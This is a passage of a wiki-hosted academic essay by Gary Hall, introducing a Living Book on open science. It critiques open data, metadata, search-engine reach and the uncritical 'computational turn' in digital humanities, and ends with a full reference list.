&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; But it is not just that Google’s algorithms are ranking some websites on the first page of its results and others on page 42 (which means, in effect, that the latter are rarely going to be accessed, since very few people read beyond the first page of Google’s results). It is that conventional search engines are reaching only an extremely small percentage of the total number of available web pages. Ten years ago Michael K. Bergman was already placing the figure at 0.03%, or [http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 ‘one in 3,000’], with ‘public information on the deep Web’ even then being ‘400 to 550 times larger than the commonly defined World Wide Web’. Consequently, while according to Bergman as much as ‘ninety-five per cent of the deep Web’ may be ‘publicly accessible information – not subject to fees or subscriptions’ – by far the vast majority of it is left untouched (Bergman, 2001). And that is before we even begin to address the issue of how the recent rise of the app, and use of the password protected Facebook for search purposes, may today be [http://www.wired.com/magazine/2010/08/ff_webrip/ annihilating the very idea of the openly searchable Web]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We can therefore see that it is not enough simply to [http://www.freeourdata.org.uk/ ‘Free Our Data’], as the Guardian has it; or to operate on the basis that ‘information wants to be free’ (Wark, 2004) (although doing so of course may be a start, especially in an era when notions of the open web and net neutrality are under severe threat). We can put ever more research and data online; we can make it freely available to both other researchers and the public under open access, open data, open science and open government conditions; we can even integrate, index and link it using the appropriate metadata to enable it to be searched and harvested with relative ease. But none of this means this research and data is going to be found. Ideas of this kind ignore the fact that all information and data is ordered, structured, selected and framed in a particular way. This is what metadata is for, after all. Metadata is information or data that describes, links to, or is otherwise used to control, find, select, filter, classify and present other data. One example would be the information provided at the front of a book detailing its publisher, date and place of publication, ISBN number, and so on. However, the term ‘metadata’ is most commonly associated with the language of computing. There, metadata is what enables computers to access files and documents, not just in their own hard drives, but potentially across a range of different platforms, servers, websites and databases. Yet for all its associations with computer science, metadata is never neutral or objective. Although the term ‘data’ comes from the Latin word datum, meaning [http://www.collinslanguage.com/results.aspx?context=3&amp;amp;reversed=False&amp;amp;action=define&amp;amp;homonym=-1&amp;amp;text=datum ‘something given’], data is not simply objectively out there in the world already provided for us. The specific ways in which metadata is created, organized and presented helps to produce (rather than merely passively reflect) what is classified as data and information – and what is not. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clearly, then, it is not just a question of free and open access to the research and data; nor of providing support, education and training on how to understand, interpret, use and apply it effectively, as [http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/ Gurstein] has argued (2010). It is also a question of who (and what) makes decisions regarding the data and metadata, and thus gets to exercise control over it, and on what basis such decisions are made. To paraphrase Lyotard once more: who decides what data and metadata is, and who knows what needs to be decided?’ (1986: 9). Who gets to legislate? And who legitimates the legislators (1986: 8)? Will the ‘ruling class’ – top civil servants and consulting firms full of people with MBAs, ‘corporate leaders, high-level administrators, and the heads of the major professional, labor, political, and religious organizations’, including those behind Google, Apple, Facebook, Amazon, JISC, AHRC, OAI, SPARC, COASP – continue to operate as the class of interpreters, gatekeepers and ‘decision makers,’ not just with regard to having ‘access to the information these machines must have in storage to guarantee that the right decisions are made’, but with regard to creating and controlling the data and metadata, too (1986: 14)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''On Data-Intensive Scholarship''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; If, as demonstrated above, discourses of openness and transparency are themselves not very open or transparent at all, much of the current emphasis on making the research and data open and free is also lacking in self-reflectivity and meaningful critique. We can see this not just in those discourses associated with open access, open data, open science and open government that are explicitly emphasizing the importance of transparency, performativity and efficiency. This lack of criticality is apparent in much of what goes under the name of ‘digital humanities’, too, especially those elements associated with the ‘computational turn’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We tend to think of the humanities as being self-reflexive per se, and as frequently asking questions capable of troubling culture and society. Yet after decades when humanities scholarship made active use of a variety of critical theories – Marxist, psychoanalytic, post-colonialist, post-Marxist – it seems somewhat surprising that many advocates of this current turn to data-intensive scholarship in the humanities find it difficult to understand computing and the digital as much more than tools, techniques and resources. As a result, much of the scholarship that is currently occurring under the ‘digital humanities’ agenda is uncritical, naive and at times even banal ([http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities Liu], 2011; [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ Higgen], 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Witness the current emphasis on making the data not only visible but also visual. Stefanie Posavec’s frequently referred to [http://www.itsbeenreal.co.uk/index.php?/wwwords/literary-organism/ Literary Organism], which visualises the structure of Part One of Kerouac’s ''On the Road'' as a tree, provides one example; those cited earlier courtesy of Lev Manovich and the Software Studies Initiative offer another. Now, there is a long history of critical engagement within the humanities with ideas of the visual, the image, the spectacle, the spectator and so on: not just in critical theory, but also in cultural studies, women’s studies, media studies, film and television studies. Such a history of critical engagement stretches back to Guy Debord’s influential 1967 work, ''The Society of the Spectacle'', and beyond. For example, in his introduction to a 1995 book edited with Lynn Cooke, ''Visual Display: Culture Beyond Appearances'', Peter Wollen writes that an excess of visual display within culture has 'the effect of concealing the truth of the society that produces it, providing the viewer with an unending stream of images that might best be understood, not simply detached from a real world of things, as Debord implied, but as effacing any trace of the symbolic, condemning the viewer to a world in which we can see everything but understand nothing—allowing us viewer-victims, in Debord’s phrase, only &amp;quot;a random choice of ephemera&amp;quot;’ (1995: 9). It can come as something of a surprise, then, to discover that this humanities tradition in which ideas of the visual are engaged critically appears to have had comparatively little impact on the current enthusiasm for data visualisation that is so prominent an aspect of the turn toward data-intensive scholarship. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Of course, this (at times explicit) repudiation of criticality could be precisely what makes certain aspects of the digital humanities so seductive for many at the moment. Exponents of the computational turn can be said to be endeavouring to avoid conforming to accepted (and often moralistic) conceptions of politics that have been decided in advance, including those that see it only in terms of power, ideology, race, gender, class, sexuality, ecology, affect etc. Refusing to [http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html ‘go through the motions of a critical avant-garde’], to borrow the words of Bruno Latour (2004), they often position themselves as responding to what is perceived as a fundamentally new cultural situation, and to the challenge it represents to our traditional methods of studying culture, by avoiding conventional theoretical manoeuvres and by experimenting with the development of fresh methods and approaches for the humanities instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, for instance, sees the sheer scale and dynamics of the contemporary new media landscape as presenting the usually accepted means of studying culture that were dominant for so much of the 20th century – the kinds of theories, concepts and methods appropriate to producing close readings of a relatively small number of texts – with a significant practical and conceptual challenge. In the past, ‘[http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html cultural theorists and historians could generate theories and histories] based on small data sets (for instance, “classical Hollywood cinema”, “Italian Renaissance”, etc.) But how can we track “global digital cultures”, with their billions of cultural objects, and hundreds of millions of contributors’, he asks (Manovich, 2010)? Three years ago Manovich was already describing the ‘numbers of people participating in social networks, sharing media, and creating user-generated content’ as simply ‘astonishing’: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html MySpace, for example,] claims 300 million users. Cyworld, a Korean site similar to MySpace, claims 90 percent of South Koreans in their 20s and 25 percent of that country's total population (as of 2006) use it. Hi5, a leading social media site in Central America has 100 million users and Facebook, 14 million photo uploads daily. The number of new videos uploaded to YouTube every twenty-four hours (as of July 2006): 65,000. (Manovich in Franklin &amp;amp;amp; Rodriguez’G, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The solution Manovich proposes to this ‘data deluge’ is to turn to the very computers, databases, software and vast amounts of born-digital networked cultural content that are causing the problem in the first place, and to use them to help develop new methods and approaches adequate to the task at hand. This is where what he calls Cultural Analytics comes in. [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘The key idea of Cultural Analytics] is the use of computers to automatically analyze cultural artefacts in visual media, extracting large numbers of features that characterize their structure and content’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009); and what is more, to do so not just with regard to the culture of the past, but also with that of the present. To this end, Manovich (not unlike the Google technology company) calls for as much of culture as possible to be made available in external, digital form: [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘not only the exceptional but also the typical]; not only the few cultural sentences spoken by a few &amp;quot;great man&amp;quot; [sic] but the patterns in all cultural sentences spoken by everybody else’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a series of posts on his Found History blog, Tom Scheinfeldt, managing director at the Center for History and New Media at George Mason University, positions such developments in terms of a shift from a concern with theory and ideology to a [http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ concern with methodology] (2008). In this respect there may well be a degree of [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ ‘relief in having escaped the culture wars of the 1980s’] – for those in the US especially – as a result of this move ‘into the space of methodological work’ (Croxall, 2010) and what Scheinfeldt reportedly dubs [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘the post-theoretical age’] (cited in P. Cohen, 2010). The problem, though, is that without such reflexive critical thinking and theories many of those whose work forms part of this computational turn find it difficult to articulate exactly what the point of what they are doing is, as Scheinfeldt readily acknowledges (2010a). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Take one of the projects mentioned earlier: the attempt by [http://victorianbooks.org Dan Cohen and Fred Gibbs] to text-mine all the books published in English in the Victorian age (or at least those digitized by Google). Among other things, this allows Cohen and Gibbs to show that use of the word ‘revolution’ in book titles of the period spiked around [http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader ‘the French Revolution and the revolutions of 1848’] (D. Cohen, 2010). But what argument are they trying to make with this calculation? What is it we are able to learn as a result of this use of computational power on their part that we did not know already and could not have discovered without it ([http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/ Scheinfeldt], 2008)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In an explicit response to Cohen and Gibbs’s project, Scheinfeldt suggests that the problem of theory, or the lack of it, may actually be a question of scale: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader It expects something of the scale of humanities scholarship] which I’m not sure is true anymore: that a single scholar—nay, every scholar—working alone will, over the course of his or her lifetime ... make a fundamental theoretical advance to the field. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Increasingly, this expectation is something peculiar to the humanities. ...it required the work of a generation of mathematicians and observational astronomers, gainfully employed, to enable the eventual “discovery” of Neptune... Since the scientific revolution, most theoretical advances play out over generations, not single careers. (Scheinfeldt, 2010b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Now, it is absolutely important that we as scholars experiment with the new tools, methods and materials that digital media technologies create and make possible, in order to bring into play new forms of Foucauldian ''dispositifs'', or what Bernard Stiegler calls ''hypomnemata'', or what I am trying to think in terms of [http://garyhall.info media gifts]. I would include in this 'experimentation imperative’ techniques and methodologies drawn from computer science and other related fields, such as information visualisation, data mining and so forth. Nevertheless, there is something troubling about this kind of deferral of critical and self-reflexive theoretical questions to an unknown point in time, still possibly a generation away. After all, the frequent suggestion is that now is not the right time to be making any such decision or judgement, since we cannot yet know how humanists will eventually come to use these tools and data, and thus what data-driven scholarship may or may not turn out to be capable of, critically, politically, theoretically. One of the consequences of this deferral, however, is that it makes it extremely difficult to judge whether this postponement is indeed acting as a responsible, political and ethical opening to the (heterogeneity and incalculability of the) future, including the future of the humanities; or whether it is serving as an alibi for a naive and rather superficial form of scholarship instead ([https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/ Meeks], 2010). A form of scholarship moreover that, in uncritically and un-self-reflexively adopting techniques and methodologies drawn from computer science, can be seen as part of the larger shift in contemporary society which Lyotard associates with the widespread use of computers and databases, and with the exteriorization of knowledge in relation to the ‘knower’. As we have seen, it is a movement away from a concern with ideals, with what is right and just and true, and toward a concern to legitimate power by optimizing the system’s performance in instrumental, functional terms. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; All of this raises some rather significant and timely questions for the humanities. Is it merely a coincidence that such a turn toward science, computing and data-intensive research is gaining momentum at a time when the UK government is emphasizing the importance of the STEM subjects (science, technology, engineering and medicine) and withdrawing support and funding from the humanities? Or is one of the reasons all this is happening now due to the fact that the humanities, like the sciences themselves, are under pressure from government, business, management, industry and increasingly the media to prove they provide value for money in instrumental, functional, performative terms? Is the interest in computing a strategic decision on the part of some of those in the humanities? As the project of Cohen and Gibbs shows, one can get funding from the likes of Google (D. Cohen, 2010). In fact, in the summer of 2010 [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘Google awarded $1 million to professors doing digital humanities research’] (P. Cohen, 2010). To what extent is the take-up of practical techniques and approaches from computing science providing some areas of the humanities with a means of defending (and refreshing) themselves in an era of global economic crisis and severe cuts to higher education, through the transformation of their knowledge and learning into quantities of information –- so-called ‘deliverables’? Can we even position the ‘computational turn’ as an event created to justify such a move on the part of certain elements within the humanities ([http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/ Frabetti], 2010)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Where does all this leave us as far as this Living Book on open science is concerned? As the argument above hopefully demonstrates, it is clearly not enough just to attempt to reveal or recover the scientific truth about, say, the environment, to counter the disinformation of others involved in the likes of the Climategate controversy. Nor is it enough merely to make the scientific research openly accessible to the public. Equally, it is not satisfactory simply to make the information, data, and associated tools, techniques and resources freely available to those in the humanities, so they can collectively and collaboratively search, mine, map, graph, model, visualize, analyse and interpret it in new ways – including some that may make it less abstract and easier for the majority of those in society to understand and follow – and, in doing so, help bridge the gap between the ‘two cultures’. It is not so much that there is a lack of information, or access to the right kind of information, or information presented in the right kind of way to ensure that the message of the scientific research and data comes across effectively and efficiently. It is not even that there is too much information, too much white noise, as ‘Bifo’ et al call it (2009: 141-142). To be sure, as a [http://oxygen.mintel.com/sinatra/reports/display/id=479774 2010 Mintel report] showed – to stay with the example of climate change – most people in the UK already know what is happening to the environment. They are just suffering from Green Fatigue, they are bored with thinking about it and thus enacting a backlash against what they perceive as ‘extreme’ pressure from environmentalist groups. This is perhaps one reason why [http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html ‘the number of cars on UK roads has risen from just over 26million in 2005 to more than 31 million in 2009’] (Shields, 2010: 30). Yet to argue there is too much information rather risks implying that there is a proper amount of information, and what would that be?&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; So we might not want to go along with Gilles Deleuze and Felix Guattari when they contend that ‘we do not lack communication. On the contrary, we have too much of it’. But we might nevertheless agree when they argue that what we actually lack is creation: ‘We lack resistance to the present’ (1994: 108). In this respect, it is not just a case of supplying more scientific research and data; nor of making the research and data that has otherwise been closed, hidden, denied or suppressed openly available for free – by opening the already existing memory and databanks to the people, for example (which is what Lyotard ended by suggesting we do). It is also a case of creating work around the research and data that does not simply go along with the shift in the status and nature of knowledge that is currently taking place. As we have seen, it is a shift toward STEM subjects and away from the humanities; toward a concern with optimizing the social system’s performance in instrumental, functional terms, and away from a concern with questions of what is just and right; and toward an emphasis on openness, freedom and transparency, and away from what is capable of disrupting and disturbing society, and what, in remaining resistant to a culture of measurement and calculation, maintains a much needed element of inaccessibility, inefficiency, delay, error, antagonism, heterogeneity and dissensus within the system. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Can this Living Book on open science be considered one such a creation? And can this series of Living Books about Life be considered another? Are they instances of a resistance to the present? Or just more white noise? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The above is based on a paper presented at the Data Landscapes, AHRC network event, held in conjunction with the British Antarctic Survey at the University of Westminster, London, December 15, 2010. An earlier version of some of the material provided above appeared in Hall [2010]) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''References''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Arthur, C. (2010), ‘Will Brussels Curb Google Guys’, ''The Guardian'', December 6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 'Bifo' Berardi, F., Jacquemet, M. and Vitali, G. (2009), ''Ethereal Shadows: Communications and Power in Contemporary Italy''. Brooklyn, New York: Autonomedia. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Bergman, M. K. (2001), ‘The Deep Web: Surfacing Hidden Value’, ''JEP: The Journal of Electronic Publishing'', vol.7, no.1, August. http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104.&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Birchall, C. (2011) 'There's Been Too Much Secrecy in this City&amp;quot;: The False Choice Between Secrecy and Transparency in US Politics,' ''Cultural Politics''&amp;amp;nbsp;7(1), March: 133-156.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Birchall, C (2011b forthcoming) ‘Transparency, Interrupted: Secrets of the Left’, Between Transparency and Secrecy', Annual Review, ''Theory, Culture and Society, ''December.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Blair, T. (2010), ''A Journey''. London: Hutchinson. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clinton, H. (2010), ‘Internet Freedom: The Prepared Text of U.S. of Secretary of State Hillary Rodham Clinton's speech, delivered at the Newseum in Washington, D.C., January 21. http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, D. (2010), ‘Searching for the Victorians’, ''Dan Cohen'', October 4. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, P. (2010) ‘Digital Keys for Unlocking the Humanities’ Riches’, ''The New York Times'', November 16. http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;amp;hp=&amp;amp;amp;pagewanted=all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Croxall, B. (2010) response to Tanner Higgen, ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. September 10. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1988) ''A Thousand Plateaus: Capitalism and Schizophrenia''. London: Athlone. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze G. and Guattari, F. (1994), ''What is Philosophy?''. New York: Columbia University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fung, A., Graham, M., Weil, D. (2007), ''Full Disclosure: The Perils and Promise of Transparency''. Cambridge: Cambridge University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Frabetti, F. (2010) ‘Digital Again? The Humanities Between the Computational Turn and Originary Technicity’, talk given to the Open Media Group, Coventry School of Art and Design. November 9. http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Franklin, K. D. and Rodriguez’G, K. (2008) ‘The Next Big Thing in Humanities, Arts and Social Science Computing: Cultural Analytics’,''HPC Wire''. July 29. http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gibbs, R. (2010), Presidential press secretary, cited in ‘White House condemns WikiLeaks' release’, ''MCNBC.com News'', November 28. http://www.msnbc.msn.com/id/40405589/ns/us_news-security. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010a), ‘Open Data: Empowering the Empowered or Effective Data Use for Everyone?’, ''Gurstein’s Community Infomatics'', September, 2. http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010b), ‘Open Data (2): Effective Data Use’, ''Gurstein’s Community Infomatics'', September, 9. http://gurstein.wordpress.com/2010/09/09/open-data-2-effective-data-use/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2011), ‘Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide’, posting to the nettime mailing list, July, 5. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hall, G. (2010), 'We Can Know It For You: The Secret Life of Metadata', ''How We Became Metadata''. London: Institute for Modern and Contemporary Culture, University of Westminster. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Higgen, T. (2010) ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System''. May 25. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hindman, M. (2009), ''The Myth of Digital Democracy''. Princeton, NJ and Oxford: Princeton University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hoffman, M. (2010), ‘EFF Posts Documents Detailing Law Enforcement Collection of Data From Social Media Sites’, ''Electronic Frontier Foundation''. March 16. http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Houghton, J. (2009) ‘Open Access - What are the Economic Benefits?: A Comparison of the United Kingdom, Netherlands and Denmark’, Centre for Strategic Economic Studies, Victoria University, Melbourne. http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Jarvis, J. (2010), ‘Time For Citizens of the Internet to Stand Up’, ''The Guardian: MediaGuardian'', March 29. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; JISC (2009), ‘Press Release: Open Science - the future for research?, posting to the BOAI list, November 16. 2009. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Kerssens, N. and Dekker A. (2009), ‘Interview with Lev Manovich for Archive 2020’, ''Virtueel_ Platform''. http://www.virtueelplatform.nl/#2595. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Knouf, N. (2010), ‘The JJPS Extension: Presenting Academic Performance Information’, ''Journal of Journal Performance Studies'', Vol 1, No 1. Available at http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6. Accessed 20 June, 2010. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Latour, B (2004), ‘Why Has Critique Run Out of Steam? From Matters of Fact to Matters of Concern”’, ''Critical Inquiry'', Vol. 30, Number 2. http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Liu, A. (2011) ‘Where is Cultural Criticism in the Digital Humanities’. Paper presented at the panel on ‘The History and Future of the Digital Humanities’” Modern Language Association convention, Los Angeles, January 7. http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J-F. (1986), ''The Postmodern Condition: A Report on Knowledge''. Manchester: Manchester University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1991) ''The Inhuman: Reflections on Time''. Cambridge: Polity. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2010a) ‘Cultural Analytics Lectures by Manovich in UK (London and Swansea), March 8-9, 2010’, ''Software Studies Initiative''. March 8. http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2011) ‘Trending: The Promises and the Challenges of Big Social Data’,''Lev Manovich'', April 28: http://www.manovich.net/DOCS/Manovich_trending_paper.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meeks, E. (2010), ‘The Digital Humanities as Imagined Community’, ''Digital Humanities Specialist''. September 14. https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mintel report, ‘Energy Efficiency in the Home - UK - July 2010’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Murray, S. Choi, S., Hoey, J., Kendall, C., Maskalyk, J., and Palepu, A. (2008), ‘Open Science, Open Access and Open Source Software at ''Open Medicine''’, ''Open Medicine'', 2(1): e1–e3. http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/?tool=pmcentrez http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Patterson, M. (2009), ‘Article-Level Metrics at PloS – Addition of Usage Data’, ''PLoS: Public Library of Science''. September 16. http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Pubget (2010), ‘[BOAI] PLoS Launches Fast (Open) PDF Access with Pubget’, posted on the BOAI list by Peter Suber, March 8. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Poynder, R. (2010), ‘Interview With Jean-Claude Bradley: The Impact of Open Notebook Science’, ''Information Today'', September. http://www.infotoday.com/IT/sep10/Poynder.shtml. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2008), ‘Sunset for Ideology, Sunrise for Methodology?’, ''Found History'', March 13. http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010a) ‘Where’s the Beef?: Does Digital Humanities Have to Answer Questions?’, ''Found History'', March 13. http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010b) response to Dan Cohen, ‘Searching for the Victorians’, ''Dan Cohen''. October 5. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Shields, R. (2010), ‘Green Fatigue Hits Campaign to Reduce Carbon Footprint’, ''The Independent'', October 10. http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Sterling, B. (2005), ''Shaping Things''. Massachussetts: MIT. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stolberg, S. G. (2009), ‘On First Day, Obama Quickly Sets a New Tone’”, ''The New York Times''. January 21. http://www.nytimes.com/2009/01/22/us/politics/22obama.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swan, A. (2009), ‘Open Access and Open Data’, ''2nd NERC Data Management Workshop'', Oxford. February 17-18. http://eprints.ecs.soton.ac.uk/17424/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swartz, A. (2010), ‘When is Transparency Useful?’ ''Aaron Swartz’s Raw Thought blog'', February 11. http://www.aaronsw.com/weblog/usefultransparency. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Vaidhyanathan, S. (2009), ‘The Googlization of Universities’, ''The NEA 2009 Almanac of Higher Education''. http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wark, M. (2004), ''A Hacker Manifesto''. Harvard: Harvard University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Westcott, S. (2009) ‘Global Warming: Brits Deny Humans are to Blame,’ ''The Express'', December 7. http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The White House (2009), ‘Memorandum for the Heads of Executive Departments and Agencies: Transparency and Open Government’. January 21. http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wollen, P. and Cooke, L. eds (1995), ''Visual Display: Culture Beyond Appearances''. Seattle: Bay Press.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5507</id>
		<title>Open science/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5507"/>
		<updated>2013-11-19T09:13:06Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: /* Gary Hall */&lt;/p&gt;
&lt;hr /&gt;
